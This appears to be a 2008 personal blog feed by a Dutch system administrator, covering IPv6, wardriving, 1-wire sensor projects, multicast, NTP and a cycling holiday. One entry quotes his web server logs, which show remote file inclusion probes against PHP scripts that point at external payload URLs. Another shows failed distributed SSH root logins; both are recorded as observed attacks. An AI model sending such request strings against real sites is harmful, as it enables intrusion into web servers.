My favourite ISP, XS4ALL is experimenting with the first IPv6 enabled loadbalancer (xs4all.general thread in Dutch) for their experimental IPv6 website XS4ALL. All 'experimental' and without any warranty that it will be available but a step forward.
2008-08-26 (#)
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79" 193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79" 193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79" 74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813" 74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813" 74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813" 193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"The one that puzzles me because I see a lot of it and can't find the associated vulnerability:62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79" 62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79" 62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"Not an advertisment for php, this.
2008-08-24 (#)
Wardriving results 17 - 24 August: 2345 new networks with gps locations. Most of them on a recumbent bicycle tour of Hilversum, a place that is mostly unmapped.
2008-08-23 (#)
Finally I counted a few light pulses with the one-wire counter. No big circuit with the Velleman MK120R kit but just a photodiode and a resistor hooked up to the counter module. I got the idea from looking at the schematics for the Hobby Boards 1-Wire Lightning Detector. The counting circuit is a phototransistor (in an optocoupler) and a resistor. With a bit of tweaking on the resistor I eventually got the counting circuit to count 2 light flashes from a flashlight. With some more tweaking of the resistor value I think I could count red flashes from the electricity meter.I also installed the lightning detector under the roof. But it is too close to the wiring of the house I think: sofar all counts are related to me being in the attic and turning on the light. In a 'real' setup I think it needs to be away from the house. Something to keep in mind for the project sundial weather station.
2008-08-19 (#)
The parts came in but I still can't make the MK120 receiver work as detector for LED light. From looking at the schematics carefully I think the receiver is tuned to the sender. What I want is quite simple: just detect on/off state and convert that to connecting or not connecting +5V and a counter input. Maybe some variant of the Infrared remote control extender circuit can do the work. The LM324 opamp in the Velleman design can be fed with +5V so maybe it is simple to go from a small current (light on a photodiode) to +5V. But this means it is not going to be an 'out of te box' working circuit. Oh well, my electronics knowledge is slowly coming back from way deep...
2008-08-19 (#)
Wardriving results 8 - 16 August (a few days missing because the upload results already scrolled out of the WiGLE upload stats) : 685 new networks with GPS locations.
2008-08-12 (#)
No local source for a photodiode which is sensitive to visible light. Time to shop on-line for a photodiode which is sensitive to red light, which will be listed as 650 nm, is directional and can deal with the amount of red light from the electricity meter LED. Reading specsheets for photodiodes is also new to me. I found a webpage with lots of explanations about LEDs and calculations. But, ordering a component on-line which costs less than a euro is a bit silly, with probably a lot more costs in shipping and handling. Conrad just charges extra for too small orders.
2008-08-10 (#)
I finished soldering the Velleman MK120 receiver I will use for detecting the lightpulses from the electricity meter for the one wire electricity measuring project. I think that is the first soldering of a circuit board since somewhere around my electronics education which finished in 1989 and I did it right! The circuit works as designed: it needs a strong infrared signal to not send out a signal via led and buzzer. I did not solder the buzzer because eventually the signal needs to go into the 1-wire counter and buzzing sounds from the cupboard under the stairs might get irritating fast. After checking whether the circuit board worked as designed I swapped the inputs on the comparator like in the 1-wire electricity monitoring design by Jon00. I did not cut traces and solder wires, I used the IC holder to set up 2 crossed wires to the pins of the IC.In testing I found that the L-53P3C photodiode is very good at receiving infrared, but the red led in our electricity meter does not emit enough infrared light to trigger the circuit. I think I'll need to find a different photodiode which is more sensitive for visible (or just red) light.
2008-08-07 (#)
At work we are experimenting with multicast but it stopped working sometime during my holiday. Multicast is quite new for our network management so it was confusing what was wrong. Lots of searching and debugging later we found a fellow Surfnet customer was announcing a rendezvous-point which wasn't going to do the pim rendezvous protocol for us. So we configured the multicast routers to fix on the Surfnet rendezvous point address (145.145.145.145). Surfnet now filters the auto-rp group to avoid problems like these in the future. We learned a lot about multicast debugging in the process.
Just in time: we hope to follow the olympic games in HD quality via multicast streams.
2008-08-06 (#)
New (for me): a distributed ssh attack. All different IPs trying to log in as root. Which I disable on systems, so it all won't work. From the logs:Jul 10 02:02:06 idefix sshd[36927]: Failed unknown for illegal user root from 198.105.8.56 port 35529 ssh2 Jul 10 02:21:34 idefix sshd[37295]: Failed unknown for illegal user root from 216.65.214.88 port 52682 ssh2 Jul 10 02:41:58 idefix sshd[37692]: Failed unknown for illegal user root from 67.59.90.96 port 47163 ssh2 Jul 10 03:02:18 idefix sshd[39260]: Failed unknown for illegal user root from 139.29.176.237 port 57930 ssh2 Jul 10 03:22:56 idefix sshd[39933]: Failed unknown for illegal user root from 75.53.25.73 port 48376 ssh2Seems like a nice distributed attack to circumvent tools that check for repeated attempts from one IP or with a too high rate. But, I still get the logcheck e-mail to point at and laugh, distributed ssh root attempts log. Probably all open proxies or part of some botnet.
2008-08-04 (#)
My 1-wire projects also got their own page. And I ordered the parts for the new project. And a few other bits, including more temperature sensors. So, with some soldering time I'll be monitoring electricity usage soon.
2008-07-31 (#)
Wardriving results 10 June - 30 July: 1615 new networks with GPS locations. Not much happening due to the holiday because I'm not taking the wardriving box on a cycling holiday.
2008-07-29 (#)
The apple tree in our back garden is so loaded with apples the branches are bending under the weight. Not breaking (yet). Looks like a lot of apples will be available in a few weeks.
The apple-tree in our garden heavy with apples.
2008-07-28 (#)
I decided to start monitoring the electricity usage in the house. Using 1-wire sounds the most logical to me as I am already using that to monitor temperatures. I found a description by Jon00 using a MK120 Velleman Kit which sounds quite compatible with my level of electronics knowledge and my budget. So I went to the local electronics shop, Radio Centrum and bought the Velleman MK120. I asked about a 1-wire counter but they don't sell 1-wire equipment (yet?). Well, a counter is something I can order from Hobby boards. Probably together with some other 1-wire stuff to make it an interesting order.
2008-07-27 (#)
Hot, hot: temperature under the roof (sensor 2)Jul 27 18:43:23 Sensor 2 C: 35.62
2008-07-27 (#)
And we're back from vacation! We cycled around Denmark for almost three weeks. A total of 1080 Kilometers on our recumbents from København to Århus along a number of the Danish islands and Jylland. We used trains from Utrecht to København and from Århus to København back to Utrecht. The intercitynightline is nice for getting from Utrecht to København in one go. It just takes a big detour of Germany. The intercitynightline and the Danish trains have no problems at all with recumbents. We saw a lot in Denmark, including a visit to Legoland in Billund and the Elmuseet. The weather was ok although we had a number of rainy days. We stayed in hostels, bed and breakfast and a few hotels.
2008-07-03 (#)
More ntp fun: I now have multicast ntp time working and documented. With the listed ntp key clients can use
the multicasted network time from ntp.cs.uu.nl. The outgoing timestamps look
like this in tcpdump:
14:45:06.821419 IP (tos 0x0, ttl 30, id 6195, offset 0, flags [none], proto 17, length: 96) 131.211.84.189.ntp > 224.0.1.1.ntp: NTPv4, length 68
Broadcast, Leap indicator: (0), Stratum 2, poll 6s, precision -19
Root Delay: 0.000000, Root dispersion: 0.001724, Reference-ID: 127.127.22.0
Reference Timestamp: 3424077852.817587474 (2008/07/03 14:44:12)
Originator Timestamp: 0.000000000
Receive Timestamp: 0.000000000
Transmit Timestamp: 3424077906.819248263 (2008/07/03 14:45:06)
Originator - Receive Timestamp: 0.000000000
Originator - Transmit Timestamp: 3424077906.819248263 (2008/07/03 14:45:06)
I also see multicasted time from 192.36.143.151 (time2.stupi.se) but I can't
find a key for it.
2008-07-03 (#)
A new peak in ntpd traffic on ntp.cs.uu.nl : 1986 packets/second. From a very limited peek at the IP numbers it seems the 'friends' at turkish telecom were quite interested in the correct time.
2008-06-30 (#)
I received a new laptop from work and started writing down the experiences just like with the previous one: The Dell Latitude D630 laptop and linux. So far nothing shocking: I chose Ubuntu as linux distro.
2008-06-16 (#)
I moved PostgreSQL on the home server gosper from an install I compiled myself ages ago to the debian-maintained package. As a side-effect the data moved from /scratch to /var which is on a different physical disk. Now the disk with /scratch and /boot has no reason to stay awake all the time and it spins down, saving another bit of power. Quite visible in the UPS stats. I guess splitting OS and lesser-used data disks in a home server can save a bit of power. The assorted sensors at home overview shows disk hda sleeping a lot more.
As a side effect the postgresql data is now also included in the backups. The database at home went from a few tables with copies of data from webprojects I was developing to data actually in use. Time for backups.
Older news items for tag english ⇒